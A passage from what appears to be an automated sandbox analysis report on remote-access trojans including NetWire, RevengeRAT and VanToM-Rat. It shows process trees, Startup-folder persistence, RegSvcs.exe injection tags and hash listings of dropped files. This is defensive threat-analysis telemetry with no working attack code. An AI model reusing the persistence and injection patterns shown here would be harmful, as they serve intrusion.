                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 6348 -ip 6348
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:5228
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 5692 -ip 5692
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:7472
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                        PID:10276
                                                                                                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                                                                                                                                                                                          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                          PID:11796
                                                                                                                                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                                                                                                                                                                                            "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                            PID:9932
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                        PID:9956
                                                                                                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                                                                                                                                                                                          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                          PID:9952
                                                                                                                                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                                                                                                                                                                                            "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:9980
                                                                                                                                                                                                                                        • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                          C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                          • Enumerates connected drives
                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                          PID:13748
                                                                                                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding F60C649EEDB41ECDDA9706576AA33BE5 C
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                            PID:7688
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe
                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                          PID:8420
                                                                                                                                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                                                                                                                                                                                            "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                            PID:9452
                                                                                                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                                                                                                                                                                                              "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:10272
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe
                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                            PID:15852
                                                                                                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                                                                                                                                                                                              "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                              PID:15476
                                                                                                                                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                                                                                                                                                                                                "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:15656
                                                                                                                                                                                                                                            • C:\Windows\system32\taskmgr.exe
                                                                                                                                                                                                                                              "C:\Windows\system32\taskmgr.exe" /7
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                              • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                              PID:7764
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                              PID:14144
                                                                                                                                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                                                                                                                                                                                                "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                PID:5468
                                                                                                                                                                                                                                                • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                                                                                                                                                                                                  "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                    PID:5340
                                                                                                                                                                                                                                              • C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                  PID:9316
                                                                                                                                                                                                                                                • C:\Users\Admin\Downloads\NetWire.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\Downloads\NetWire.exe"
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                  PID:12200
                                                                                                                                                                                                                                                  • C:\Users\Admin\Downloads\NetWire.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\Downloads\NetWire.exe"
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                    PID:11288
                                                                                                                                                                                                                                                    • C:\Program Files (x86)\internet explorer\ieinstal.exe
                                                                                                                                                                                                                                                      "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                        PID:2352
                                                                                                                                                                                                                                                  • C:\Users\Admin\Downloads\VanToM-Rat.bat
                                                                                                                                                                                                                                                    "C:\Users\Admin\Downloads\VanToM-Rat.bat"
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                    PID:3196
                                                                                                                                                                                                                                                  • C:\Users\Admin\Downloads\RevengeRAT.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\Downloads\RevengeRAT.exe"
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                    PID:8708
                                                                                                                                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                                                                                                                                                                                                      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                      PID:9392
                                                                                                                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                                                                                                                                                                                                        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                          PID:2880
                                                                                                                                                                                                                                                    • C:\Users\Admin\Downloads\RevengeRAT.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\Downloads\RevengeRAT.exe"
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                      PID:2060
                                                                                                                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                                                                                                                                                                                                        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                        PID:4864
                                                                                                                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                                                                                                                                                                                                          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                          PID:11004
                                                                                                                                                                                                                                                    • C:\Users\Admin\Downloads\RevengeRAT.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\Downloads\RevengeRAT.exe"
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                      PID:10348
                                                                                                                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                                                                                                                                                                                                        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                        PID:9172
                                                                                                                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                                                                                                                                                                                                          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                            PID:8756
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe
                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                        PID:13052
                                                                                                                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                                                                                                                                                                                                          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                          PID:16144
                                                                                                                                                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                                                                                                                                                                                                            "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                            PID:10428
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe
                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                        PID:5552
                                                                                                                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                                                                                                                                                                                                          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                          PID:13396
                                                                                                                                                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                                                                                                                                                                                                            "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                              PID:7988
                                                                                                                                                                                                                                                        • C:\Windows\system32\LogonUI.exe
                                                                                                                                                                                                                                                          "LogonUI.exe" /flags:0x4 /state0:0xa38ad855 /state1:0x41c64e6d
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                            PID:5840

                                                                                                                                                                                                                                                          Network

                                                                                                                                                                                                                                                          MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                          Replay Monitor

                                                                                                                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                                                                                                                          Downloads

                                                                                                                                                                                                                                                          • C:\ProgramData\svchost\vcredist2010_x64.log-MSI_vc_red.msi.ico

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            fde1b01ca49aa70922404cdfcf32a643

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            b0a2002c39a37a0ccaf219d42f1075471fd8b481

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            741fe085e34db44b7c8ae83288697fab1359b028411c45dab2a3ca8b9ea548a5

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            b6b4af427069602e929c1a6ce9d88c4634f0927b7292efb4070d15fb40ce39fc5ce868452dcd5642b2864730502de7a4c33679c936beb1a86c26a753d3f4dc25

                                                                                                                                                                                                                                                          • C:\ProgramData\svchost\vcredist2010_x64.log.ico

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            bb4ff6746434c51de221387a31a00910

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            43e764b72dc8de4f65d8cf15164fc7868aa76998

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            546c4eeccca3320558d30eac5dc3d4726846bdc54af33aa63ac8f3e6fc128506

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            1e4c405eca8d1b02147271095545434697d3d672310b4ea2ecca8715eaa9689be3f25c3d4898e7a4b42c413f258eda729a70f5ad8bc314a742082b5a6a8e9ff1

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\RegSvcs.exe.log

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            120B

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            50dec1858e13f033e6dca3cbfad5e8de

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            79ae1e9131b0faf215b499d2f7b4c595aa120925

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            14a557e226e3ba8620bb3a70035e1e316f1e9fb5c9e8f74c07110ee90b8d8ae4

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            1bd73338df685a5b57b0546e102ecfdee65800410d6f77845e50456ac70de72929088af19b59647f01cba7a5acfb399c52d9ef2402a9451366586862ef88e7bf

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            152B

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            9e3fc58a8fb86c93d19e1500b873ef6f

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            c6aae5f4e26f5570db5e14bba8d5061867a33b56

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            828f4eacac1c40b790fd70dbb6fa6ba03dcc681171d9b2a6579626d27837b1c4

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            e5e245b56fa82075e060f468a3224cf2ef43f1b6d87f0351a2102d85c7c897e559be4caeaecfdc4059af29fdc674681b61229319dda95cb2ee649b2eb98d313e

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            152B

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            27304926d60324abe74d7a4b571c35ea

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            78b8f92fcaf4a09eaa786bbe33fd1b0222ef29c1

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            7039ad5c2b40f4d97c8c2269f4942be13436d739b2e1f8feb7a0c9f9fdb931de

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            f5b6181d3f432238c7365f64fc8a373299e23ba8178bcc419471916ef8b23e909787c7c0617ab22e4eb90909c02bd7b84f1386fbc61e2bdb5a0eb474175da4bd

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\temp-index

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            b9b2febb1a6c8cd45370384d0e7be245

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            0668b3be7bea79889200e3e98e9f21af126a5586

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            25a0a9f55b25023d9aa407a2056323e71cde839fcfc4b1d6454fb786759edd1f

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            419d69277204dc5810dbcbae6998cffa8962553fafcb3f8676af7c7b00c7493e98ad1f07d24d1f3018464eea69e1112100ca12cdfaf413d785fce8b4675aa3b4

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            607a7a7253fd04e746aa03a44ecb4d82

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            7dde932b1d6c2e7a39e177b9b25c79af06ba97ad

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            f8e4e860104f4bbe1e0af0e6fcab74305f5420092d97b0bcf2b7a0169186224d

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            857b0d127e3182ad2b8b8522e921abc71d368ce2f99a3692a5e9787fb027db25edac14d1a07224aec306178f33a5771369f8797680c8eca174f62b01fb0a9096

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            5KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            dfc6e47cd78d1f003f53011565ddbb9f

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            ccce6ab2faf72eb46e5011b85fe16bb3183ede50

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            6ca861ee8e93103f8e2107400d6a28eac7bc785bcb6cb2cf6bbf362d6d279427

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            c152d0fdeb8c0b82e8d4ed322ed3c6a656cbfc87ff02a30db2206971c572994103534c39c44358abfd4656bcd479e625f89031d99c803047974804311e748a88

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            936B

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            426b6da65df9b0182b1886a0482f760d

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            0bebce9075f1020c535fea5c4ca739de9db329d4

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            a82ef2013b75afe856d0a516fe93a81b4f3e07f56aa652cc59c650ebe325e69f

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            3fee171f7bf6673da2f8bf39aac762e3f3d99088a2a264c7cab7ce9bab2a57bf7afbf94ee12ce9f684dfb4d42e7c77ca9293395e889825fa628c770ed7ec3420

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            2KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            ce621ef6b24471777792f0ca89684c7e

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            3eda0b4653d2acf0788d1a03306ddf7584ec1ef8

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            22ac2aa7132fe1646064797172afa5f56dfa4dc01178d4c0a9b99759f6a0d9ba

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            c7de407ec6331148d7c3c8da45aeaade2c9def0c56176e3027cea5206ca1e41f71ca4799d96dc5be508e438749f98709bdf2c0248c8e23022bee68ccde6717b2

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            7KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            a12bc93d1079edc3aa87fba341de7307

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            e3d66c48a97b93bb55297e1673031ee213126773

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            9b0d89207390096b09c4e9572ec2d81b3524f7ed12147488b824e9493f9881b1

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            165b3ad2c4be6ef8f012d42ff2a7658de9860b3a4a5879b9117f613657695d1a18b2b3ff9c879508a75efc438a3888beb638f56fe353821fe1b94b759f13be43

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            7KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            1d29cb2db710f8a2dcdac03debfd9539

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            bff219a055f5d8e477392c1f22c9562162a9404a

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            0114ff91cbd74d29190d01be8a162ef34b54102befb0db20c82f47ff883cc20e

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            999a817de5f4b5057005449e2e04d4e73da3164491c68c57311025363cfeae9156d5ef0053e6f6a4c9be90dfa3a8cc09e796b353caaed172d525ba627d01856a

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            5KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            4fca48e2a1fcf19f9629779eda989308

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            503d3cdb8d8daa0c69cba8504a31701980d3c5f2

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            6a229df38efcea018785443bd8fa2c65c366b55c71db46c8aed54de46f0406b2

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            5685e002de0132cd1fb2dc900c6c2a5bd660d4c382cd80cf7273e793f3bd91dd71fa73df75188f09d271169cefec024bb98954f14785786d1e000b2605d27798

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            6KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            9ac5950030ff64b65017c0f7734b89ee

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            df0135301a7354cfc6a9ec03778c370e0f3d3aaf

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            8b0a545ec0b1790e7fa7b61d673a3fe215f6211ff01799e7ac38f9947afc82e0

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            ed35e013122e0312edbb80a4e402fe6de0083405d43ff6afe4fcb75c396985168eaa884df6e446097b129ee94ebc236a1fe54fbd09d906327eaeef23f319292a

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            6KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            681a292a9eb77adf4a0a48e2d7582547

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            b82999eaa1c84270698a4302691cd9398f706362

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            00fc7ac77bec85abf3a7c7785a69eee3c085c3fd594e765a5ed7a8e5ff19841d

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            3db43caeccf59ab8815b1e47a405bb8dad0e5a60b91eb38b19a372584452f5bf131dbb4b1482ab47bebf6dbff5161723e4a02c25438832e37b06989bae5403a4

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            7KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            fd0d16af58e820fea2eae6bcb86dbc6c

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            6de09dee052bed2792ee078c44aaf71f94f8c41e

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            82a184926e0668eb07f0b4a0451701a7ad65d12b68f36b28720d03bfba8576a7

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            ae0d679c2c2fa4fcf4568d10685b2642d9eac5b084937eb11b1aeeee270236cbd38b5ef64c0be2e3356b886e7ee763228422f31844144cae3fd7b7e66feae97b

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            7KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            d545ad19ccbf736f85b04e80e4cc31a9

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            129fe1d62a436d0c5a23558942e449bb940a0d6e

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            c2c17fca875273c05fd1abc5e36bc953478265df950ed394a0f8c53317a065d4

